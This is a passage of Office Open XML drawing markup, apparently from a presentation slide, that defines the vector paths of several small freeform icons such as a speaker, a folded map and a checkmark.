                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="30"/>
                      <a:pt x="87" y="26"/>
                      <a:pt x="84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09" name="Freeform 144">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12D76592-0B98-4E49-BACD-4B32A34084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66343" y="3900582"/>
                <a:ext cx="326874" cy="277941"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 84 w 102"/>
                  <a:gd name="T1" fmla="*/ 82 h 87"/>
                  <a:gd name="T2" fmla="*/ 81 w 102"/>
                  <a:gd name="T3" fmla="*/ 81 h 87"/>
                  <a:gd name="T4" fmla="*/ 81 w 102"/>
                  <a:gd name="T5" fmla="*/ 74 h 87"/>
                  <a:gd name="T6" fmla="*/ 93 w 102"/>
                  <a:gd name="T7" fmla="*/ 44 h 87"/>
                  <a:gd name="T8" fmla="*/ 81 w 102"/>
                  <a:gd name="T9" fmla="*/ 13 h 87"/>
                  <a:gd name="T10" fmla="*/ 81 w 102"/>
                  <a:gd name="T11" fmla="*/ 6 h 87"/>
                  <a:gd name="T12" fmla="*/ 87 w 102"/>
                  <a:gd name="T13" fmla="*/ 6 h 87"/>
                  <a:gd name="T14" fmla="*/ 102 w 102"/>
                  <a:gd name="T15" fmla="*/ 44 h 87"/>
                  <a:gd name="T16" fmla="*/ 87 w 102"/>
                  <a:gd name="T17" fmla="*/ 81 h 87"/>
                  <a:gd name="T18" fmla="*/ 84 w 102"/>
                  <a:gd name="T19" fmla="*/ 82 h 87"/>
                  <a:gd name="T20" fmla="*/ 68 w 102"/>
                  <a:gd name="T21" fmla="*/ 74 h 87"/>
                  <a:gd name="T22" fmla="*/ 65 w 102"/>
                  <a:gd name="T23" fmla="*/ 72 h 87"/>
                  <a:gd name="T24" fmla="*/ 65 w 102"/>
                  <a:gd name="T25" fmla="*/ 66 h 87"/>
                  <a:gd name="T26" fmla="*/ 65 w 102"/>
                  <a:gd name="T27" fmla="*/ 21 h 87"/>
                  <a:gd name="T28" fmla="*/ 65 w 102"/>
                  <a:gd name="T29" fmla="*/ 15 h 87"/>
                  <a:gd name="T30" fmla="*/ 71 w 102"/>
                  <a:gd name="T31" fmla="*/ 15 h 87"/>
                  <a:gd name="T32" fmla="*/ 83 w 102"/>
                  <a:gd name="T33" fmla="*/ 44 h 87"/>
                  <a:gd name="T34" fmla="*/ 71 w 102"/>
                  <a:gd name="T35" fmla="*/ 72 h 87"/>
                  <a:gd name="T36" fmla="*/ 68 w 102"/>
                  <a:gd name="T37" fmla="*/ 74 h 87"/>
                  <a:gd name="T38" fmla="*/ 52 w 102"/>
                  <a:gd name="T39" fmla="*/ 65 h 87"/>
                  <a:gd name="T40" fmla="*/ 49 w 102"/>
                  <a:gd name="T41" fmla="*/ 64 h 87"/>
                  <a:gd name="T42" fmla="*/ 49 w 102"/>
                  <a:gd name="T43" fmla="*/ 57 h 87"/>
                  <a:gd name="T44" fmla="*/ 49 w 102"/>
                  <a:gd name="T45" fmla="*/ 30 h 87"/>
                  <a:gd name="T46" fmla="*/ 49 w 102"/>
                  <a:gd name="T47" fmla="*/ 23 h 87"/>
                  <a:gd name="T48" fmla="*/ 55 w 102"/>
                  <a:gd name="T49" fmla="*/ 23 h 87"/>
                  <a:gd name="T50" fmla="*/ 55 w 102"/>
                  <a:gd name="T51" fmla="*/ 64 h 87"/>
                  <a:gd name="T52" fmla="*/ 52 w 102"/>
                  <a:gd name="T53" fmla="*/ 65 h 87"/>
                  <a:gd name="T54" fmla="*/ 38 w 102"/>
                  <a:gd name="T55" fmla="*/ 3 h 87"/>
                  <a:gd name="T56" fmla="*/ 42 w 102"/>
                  <a:gd name="T57" fmla="*/ 5 h 87"/>
                  <a:gd name="T58" fmla="*/ 42 w 102"/>
                  <a:gd name="T59" fmla="*/ 82 h 87"/>
                  <a:gd name="T60" fmla="*/ 38 w 102"/>
                  <a:gd name="T61" fmla="*/ 84 h 87"/>
                  <a:gd name="T62" fmla="*/ 15 w 102"/>
                  <a:gd name="T63" fmla="*/ 62 h 87"/>
                  <a:gd name="T64" fmla="*/ 0 w 102"/>
                  <a:gd name="T65" fmla="*/ 62 h 87"/>
                  <a:gd name="T66" fmla="*/ 0 w 102"/>
                  <a:gd name="T67" fmla="*/ 25 h 87"/>
                  <a:gd name="T68" fmla="*/ 15 w 102"/>
                  <a:gd name="T69" fmla="*/ 25 h 87"/>
                  <a:gd name="T70" fmla="*/ 38 w 102"/>
                  <a:gd name="T71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2" h="87">
                    <a:moveTo>
                      <a:pt x="84" y="82"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="82"/>
                      <a:pt x="81" y="82"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="79"/>
                      <a:pt x="79" y="76"/>
                      <a:pt x="81" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="66"/>
                      <a:pt x="93" y="55"/>
                      <a:pt x="93" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="32"/>
                      <a:pt x="89" y="21"/>
                      <a:pt x="81" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="11"/>
                      <a:pt x="79" y="8"/>
                      <a:pt x="81" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="4"/>
                      <a:pt x="85" y="4"/>
                      <a:pt x="87" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="16"/>
                      <a:pt x="102" y="29"/>
                      <a:pt x="102" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="58"/>
                      <a:pt x="97" y="71"/>
                      <a:pt x="87" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="82"/>
                      <a:pt x="85" y="82"/>
                      <a:pt x="84" y="82"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="68" y="74"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="74"/>
                      <a:pt x="65" y="73"/>
                      <a:pt x="65" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="70"/>
                      <a:pt x="63" y="68"/>
                      <a:pt x="65" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="54"/>
                      <a:pt x="77" y="33"/>
                      <a:pt x="65" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="19"/>
                      <a:pt x="63" y="17"/>
                      <a:pt x="65" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="13"/>
                      <a:pt x="69" y="13"/>
                      <a:pt x="71" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="22"/>
                      <a:pt x="83" y="33"/>
                      <a:pt x="83" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="54"/>
                      <a:pt x="79" y="65"/>
                      <a:pt x="71" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="73"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="68" y="74"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="52" y="65"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="65"/>
                      <a:pt x="49" y="65"/>
                      <a:pt x="49" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="62"/>
                      <a:pt x="47" y="59"/>
                      <a:pt x="49" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="50"/>
                      <a:pt x="56" y="37"/>
                      <a:pt x="49" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="28"/>
                      <a:pt x="47" y="25"/>
                      <a:pt x="49" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="22"/>
                      <a:pt x="53" y="22"/>
                      <a:pt x="55" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="34"/>
                      <a:pt x="66" y="53"/>
                      <a:pt x="55" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="65"/>
                      <a:pt x="53" y="65"/>
                      <a:pt x="52" y="65"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="38" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="42" y="1"/>
                      <a:pt x="42" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="82"/>
                      <a:pt x="42" y="82"/>
                      <a:pt x="42" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="86"/>
                      <a:pt x="40" y="87"/>
                      <a:pt x="38" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="62"/>
                      <a:pt x="15" y="62"/>
                      <a:pt x="15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5" y="25"/>
                      <a:pt x="15" y="25"/>
                      <a:pt x="15" y="25"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38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0" name="Freeform 145">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A28C27A-B133-4371-96E2-CE997D56D4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86444" y="3544348"/>
                <a:ext cx="369936" cy="326873"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 124 w 189"/>
                  <a:gd name="T1" fmla="*/ 23 h 167"/>
                  <a:gd name="T2" fmla="*/ 65 w 189"/>
                  <a:gd name="T3" fmla="*/ 0 h 167"/>
                  <a:gd name="T4" fmla="*/ 0 w 189"/>
                  <a:gd name="T5" fmla="*/ 23 h 167"/>
                  <a:gd name="T6" fmla="*/ 0 w 189"/>
                  <a:gd name="T7" fmla="*/ 167 h 167"/>
                  <a:gd name="T8" fmla="*/ 65 w 189"/>
                  <a:gd name="T9" fmla="*/ 142 h 167"/>
                  <a:gd name="T10" fmla="*/ 124 w 189"/>
                  <a:gd name="T11" fmla="*/ 167 h 167"/>
                  <a:gd name="T12" fmla="*/ 189 w 189"/>
                  <a:gd name="T13" fmla="*/ 142 h 167"/>
                  <a:gd name="T14" fmla="*/ 189 w 189"/>
                  <a:gd name="T15" fmla="*/ 0 h 167"/>
                  <a:gd name="T16" fmla="*/ 124 w 189"/>
                  <a:gd name="T17" fmla="*/ 23 h 167"/>
                  <a:gd name="T18" fmla="*/ 70 w 189"/>
                  <a:gd name="T19" fmla="*/ 15 h 167"/>
                  <a:gd name="T20" fmla="*/ 119 w 189"/>
                  <a:gd name="T21" fmla="*/ 35 h 167"/>
                  <a:gd name="T22" fmla="*/ 119 w 189"/>
                  <a:gd name="T23" fmla="*/ 152 h 167"/>
                  <a:gd name="T24" fmla="*/ 70 w 189"/>
                  <a:gd name="T25" fmla="*/ 133 h 167"/>
                  <a:gd name="T26" fmla="*/ 70 w 189"/>
                  <a:gd name="T27" fmla="*/ 15 h 167"/>
                  <a:gd name="T28" fmla="*/ 11 w 189"/>
                  <a:gd name="T29" fmla="*/ 31 h 167"/>
                  <a:gd name="T30" fmla="*/ 58 w 189"/>
                  <a:gd name="T31" fmla="*/ 15 h 167"/>
                  <a:gd name="T32" fmla="*/ 58 w 189"/>
                  <a:gd name="T33" fmla="*/ 133 h 167"/>
                  <a:gd name="T34" fmla="*/ 11 w 189"/>
                  <a:gd name="T35" fmla="*/ 151 h 167"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 31 h 167"/>
                  <a:gd name="T38" fmla="*/ 178 w 189"/>
                  <a:gd name="T39" fmla="*/ 134 h 167"/>
                  <a:gd name="T40" fmla="*/ 130 w 189"/>
                  <a:gd name="T41" fmla="*/ 152 h 167"/>
                  <a:gd name="T42" fmla="*/ 130 w 189"/>
                  <a:gd name="T43" fmla="*/ 35 h 167"/>
                  <a:gd name="T44" fmla="*/ 178 w 189"/>
                  <a:gd name="T45" fmla="*/ 17 h 167"/>
                  <a:gd name="T46" fmla="*/ 178 w 189"/>
                  <a:gd name="T47" fmla="*/ 13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9" h="167">
                    <a:moveTo>
                      <a:pt x="124" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="65" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="23"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="70" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="119" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="15"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="11" y="31"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="31"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="178" y="134"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="1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1" name="Freeform 146">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{836D8868-3640-4D93-AA77-9A5169B238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78439" y="2322975"/>
                <a:ext cx="405168" cy="409081"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 127"/>
                  <a:gd name="T1" fmla="*/ 0 h 128"/>
                  <a:gd name="T2" fmla="*/ 0 w 127"/>
                  <a:gd name="T3" fmla="*/ 64 h 128"/>
                  <a:gd name="T4" fmla="*/ 63 w 127"/>
                  <a:gd name="T5" fmla="*/ 128 h 128"/>
                  <a:gd name="T6" fmla="*/ 127 w 127"/>
                  <a:gd name="T7" fmla="*/ 64 h 128"/>
                  <a:gd name="T8" fmla="*/ 63 w 127"/>
                  <a:gd name="T9" fmla="*/ 0 h 128"/>
                  <a:gd name="T10" fmla="*/ 52 w 127"/>
                  <a:gd name="T11" fmla="*/ 104 h 128"/>
                  <a:gd name="T12" fmla="*/ 25 w 127"/>
                  <a:gd name="T13" fmla="*/ 69 h 128"/>
                  <a:gd name="T14" fmla="*/ 37 w 127"/>
                  <a:gd name="T15" fmla="*/ 57 h 128"/>
                  <a:gd name="T16" fmla="*/ 52 w 127"/>
                  <a:gd name="T17" fmla="*/ 76 h 128"/>
                  <a:gd name="T18" fmla="*/ 98 w 127"/>
                  <a:gd name="T19" fmla="*/ 38 h 128"/>
                  <a:gd name="T20" fmla="*/ 103 w 127"/>
                  <a:gd name="T21" fmla="*/ 44 h 128"/>
                  <a:gd name="T22" fmla="*/ 52 w 127"/>
                  <a:gd name="T2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7" h="128">
                    <a:moveTo>
                      <a:pt x="63" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="0" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="99"/>
                      <a:pt x="28" y="128"/>
                      <a:pt x="63" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="128"/>
                      <a:pt x="127" y="99"/>
                      <a:pt x="127" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="29"/>
                      <a:pt x="99" y="0"/>
                      <a:pt x="63" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="52" y="104"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="69"/>
                      <a:pt x="25" y="69"/>
                      <a:pt x="25" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="57"/>
                      <a:pt x="37" y="57"/>
                      <a:pt x="37" y="57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3" y="44"/>
                      <a:pt x="103" y="44"/>
                      <a:pt x="103" y="44"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="52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2" name="Freeform 147">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E582BA4-319C-47D2-9501-3E9750F267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258707" y="5188504"/>
                <a:ext cx="307301" cy="307300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 157"/>
                  <a:gd name="T1" fmla="*/ 74 h 157"/>
                  <a:gd name="T2" fmla="*/ 0 w 157"/>
                  <a:gd name="T3" fmla="*/ 23 h 157"/>
                  <a:gd name="T4" fmla="*/ 64 w 157"/>
                  <a:gd name="T5" fmla="*/ 13 h 157"/>
                  <a:gd name="T6" fmla="*/ 64 w 157"/>
                  <a:gd name="T7" fmla="*/ 74 h 157"/>
                  <a:gd name="T8" fmla="*/ 0 w 157"/>
                  <a:gd name="T9" fmla="*/ 74 h 157"/>
                  <a:gd name="T10" fmla="*/ 73 w 157"/>
                  <a:gd name="T11" fmla="*/ 12 h 157"/>
                  <a:gd name="T12" fmla="*/ 157 w 157"/>
                  <a:gd name="T13" fmla="*/ 0 h 157"/>
                  <a:gd name="T14" fmla="*/ 157 w 157"/>
                  <a:gd name="T15" fmla="*/ 74 h 157"/>
                  <a:gd name="T16" fmla="*/ 73 w 157"/>
                  <a:gd name="T17" fmla="*/ 74 h 157"/>
                  <a:gd name="T18" fmla="*/ 73 w 157"/>
                  <a:gd name="T19" fmla="*/ 12 h 157"/>
                  <a:gd name="T20" fmla="*/ 157 w 157"/>
                  <a:gd name="T21" fmla="*/ 84 h 157"/>
                  <a:gd name="T22" fmla="*/ 157 w 157"/>
                  <a:gd name="T23" fmla="*/ 157 h 157"/>
                  <a:gd name="T24" fmla="*/ 73 w 157"/>
                  <a:gd name="T25" fmla="*/ 146 h 157"/>
                  <a:gd name="T26" fmla="*/ 73 w 157"/>
                  <a:gd name="T27" fmla="*/ 84 h 157"/>
                  <a:gd name="T28" fmla="*/ 157 w 157"/>
                  <a:gd name="T29" fmla="*/ 84 h 157"/>
                  <a:gd name="T30" fmla="*/ 64 w 157"/>
                  <a:gd name="T31" fmla="*/ 144 h 157"/>
                  <a:gd name="T32" fmla="*/ 0 w 157"/>
                  <a:gd name="T33" fmla="*/ 136 h 157"/>
                  <a:gd name="T34" fmla="*/ 0 w 157"/>
                  <a:gd name="T35" fmla="*/ 84 h 157"/>
                  <a:gd name="T36" fmla="*/ 64 w 157"/>
                  <a:gd name="T37" fmla="*/ 84 h 157"/>
                  <a:gd name="T38" fmla="*/ 64 w 157"/>
                  <a:gd name="T39" fmla="*/ 144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57">
                    <a:moveTo>
                      <a:pt x="0" y="74"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="74"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="157" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="12"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="157" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="157" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="84"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="64" y="144"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64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3" name="Freeform 148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA7250C-F4B3-49E4-AA5E-3586C6EA09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22047" y="5121955"/>
                <a:ext cx="272069" cy="272068"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 85"/>
                  <a:gd name="T1" fmla="*/ 42 h 85"/>
                  <a:gd name="T2" fmla="*/ 29 w 85"/>
                  <a:gd name="T3" fmla="*/ 70 h 85"/>
                  <a:gd name="T4" fmla="*/ 14 w 85"/>
                  <a:gd name="T5" fmla="*/ 30 h 85"/>
                  <a:gd name="T6" fmla="*/ 11 w 85"/>
                  <a:gd name="T7" fmla="*/ 42 h 85"/>
                  <a:gd name="T8" fmla="*/ 64 w 85"/>
                  <a:gd name="T9" fmla="*/ 41 h 85"/>
                  <a:gd name="T10" fmla="*/ 62 w 85"/>
                  <a:gd name="T11" fmla="*/ 32 h 85"/>
                  <a:gd name="T12" fmla="*/ 59 w 85"/>
                  <a:gd name="T13" fmla="*/ 25 h 85"/>
                  <a:gd name="T14" fmla="*/ 64 w 85"/>
                  <a:gd name="T15" fmla="*/ 20 h 85"/>
                  <a:gd name="T16" fmla="*/ 64 w 85"/>
                  <a:gd name="T17" fmla="*/ 20 h 85"/>
                  <a:gd name="T18" fmla="*/ 43 w 85"/>
                  <a:gd name="T19" fmla="*/ 11 h 85"/>
                  <a:gd name="T20" fmla="*/ 16 w 85"/>
                  <a:gd name="T21" fmla="*/ 25 h 85"/>
                  <a:gd name="T22" fmla="*/ 18 w 85"/>
                  <a:gd name="T23" fmla="*/ 25 h 85"/>
                  <a:gd name="T24" fmla="*/ 27 w 85"/>
                  <a:gd name="T25" fmla="*/ 25 h 85"/>
                  <a:gd name="T26" fmla="*/ 27 w 85"/>
                  <a:gd name="T27" fmla="*/ 28 h 85"/>
                  <a:gd name="T28" fmla="*/ 23 w 85"/>
                  <a:gd name="T29" fmla="*/ 28 h 85"/>
                  <a:gd name="T30" fmla="*/ 35 w 85"/>
                  <a:gd name="T31" fmla="*/ 61 h 85"/>
                  <a:gd name="T32" fmla="*/ 42 w 85"/>
                  <a:gd name="T33" fmla="*/ 41 h 85"/>
                  <a:gd name="T34" fmla="*/ 37 w 85"/>
                  <a:gd name="T35" fmla="*/ 28 h 85"/>
                  <a:gd name="T36" fmla="*/ 34 w 85"/>
                  <a:gd name="T37" fmla="*/ 28 h 85"/>
                  <a:gd name="T38" fmla="*/ 34 w 85"/>
                  <a:gd name="T39" fmla="*/ 25 h 85"/>
                  <a:gd name="T40" fmla="*/ 42 w 85"/>
                  <a:gd name="T41" fmla="*/ 25 h 85"/>
                  <a:gd name="T42" fmla="*/ 51 w 85"/>
                  <a:gd name="T43" fmla="*/ 25 h 85"/>
                  <a:gd name="T44" fmla="*/ 51 w 85"/>
                  <a:gd name="T45" fmla="*/ 28 h 85"/>
                  <a:gd name="T46" fmla="*/ 47 w 85"/>
                  <a:gd name="T47" fmla="*/ 28 h 85"/>
                  <a:gd name="T48" fmla="*/ 59 w 85"/>
                  <a:gd name="T49" fmla="*/ 61 h 85"/>
                  <a:gd name="T50" fmla="*/ 62 w 85"/>
                  <a:gd name="T51" fmla="*/ 51 h 85"/>
                  <a:gd name="T52" fmla="*/ 64 w 85"/>
                  <a:gd name="T53" fmla="*/ 41 h 85"/>
                  <a:gd name="T54" fmla="*/ 43 w 85"/>
                  <a:gd name="T55" fmla="*/ 45 h 85"/>
                  <a:gd name="T56" fmla="*/ 34 w 85"/>
                  <a:gd name="T57" fmla="*/ 72 h 85"/>
                  <a:gd name="T58" fmla="*/ 43 w 85"/>
                  <a:gd name="T59" fmla="*/ 73 h 85"/>
                  <a:gd name="T60" fmla="*/ 53 w 85"/>
                  <a:gd name="T61" fmla="*/ 72 h 85"/>
                  <a:gd name="T62" fmla="*/ 53 w 85"/>
                  <a:gd name="T63" fmla="*/ 71 h 85"/>
                  <a:gd name="T64" fmla="*/ 43 w 85"/>
                  <a:gd name="T65" fmla="*/ 45 h 85"/>
                  <a:gd name="T66" fmla="*/ 71 w 85"/>
                  <a:gd name="T67" fmla="*/ 28 h 85"/>
                  <a:gd name="T68" fmla="*/ 71 w 85"/>
                  <a:gd name="T69" fmla="*/ 31 h 85"/>
                  <a:gd name="T70" fmla="*/ 69 w 85"/>
                  <a:gd name="T71" fmla="*/ 42 h 85"/>
                  <a:gd name="T72" fmla="*/ 59 w 85"/>
                  <a:gd name="T73" fmla="*/ 69 h 85"/>
                  <a:gd name="T74" fmla="*/ 75 w 85"/>
                  <a:gd name="T75" fmla="*/ 42 h 85"/>
                  <a:gd name="T76" fmla="*/ 71 w 85"/>
                  <a:gd name="T77" fmla="*/ 28 h 85"/>
                  <a:gd name="T78" fmla="*/ 43 w 85"/>
                  <a:gd name="T79" fmla="*/ 0 h 85"/>
                  <a:gd name="T80" fmla="*/ 0 w 85"/>
                  <a:gd name="T81" fmla="*/ 42 h 85"/>
                  <a:gd name="T82" fmla="*/ 43 w 85"/>
                  <a:gd name="T83" fmla="*/ 85 h 85"/>
                  <a:gd name="T84" fmla="*/ 85 w 85"/>
                  <a:gd name="T85" fmla="*/ 42 h 85"/>
                  <a:gd name="T86" fmla="*/ 43 w 85"/>
                  <a:gd name="T87" fmla="*/ 0 h 85"/>
                  <a:gd name="T88" fmla="*/ 43 w 85"/>
                  <a:gd name="T89" fmla="*/ 79 h 85"/>
                  <a:gd name="T90" fmla="*/ 6 w 85"/>
                  <a:gd name="T91" fmla="*/ 42 h 85"/>
                  <a:gd name="T92" fmla="*/ 43 w 85"/>
                  <a:gd name="T93" fmla="*/ 5 h 85"/>
                  <a:gd name="T94" fmla="*/ 80 w 85"/>
                  <a:gd name="T95" fmla="*/ 42 h 85"/>
                  <a:gd name="T96" fmla="*/ 43 w 85"/>
                  <a:gd name="T97" fmla="*/ 7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5" h="85">
                    <a:moveTo>
                      <a:pt x="11" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="55"/>
                      <a:pt x="18" y="65"/>
                      <a:pt x="29" y="7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2" y="34"/>
                      <a:pt x="11" y="38"/>
                      <a:pt x="11" y="42"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="64" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="37"/>
                      <a:pt x="63" y="34"/>
                      <a:pt x="62" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="30"/>
                      <a:pt x="59" y="28"/>
                      <a:pt x="59" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="22"/>
                      <a:pt x="61" y="20"/>
                      <a:pt x="64" y="20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9" y="15"/>
                      <a:pt x="51" y="11"/>
                      <a:pt x="43" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="11"/>
                      <a:pt x="22" y="17"/>
                      <a:pt x="16" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="25"/>
                      <a:pt x="18" y="25"/>
                      <a:pt x="18" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="25"/>
                      <a:pt x="27" y="25"/>
                      <a:pt x="27" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
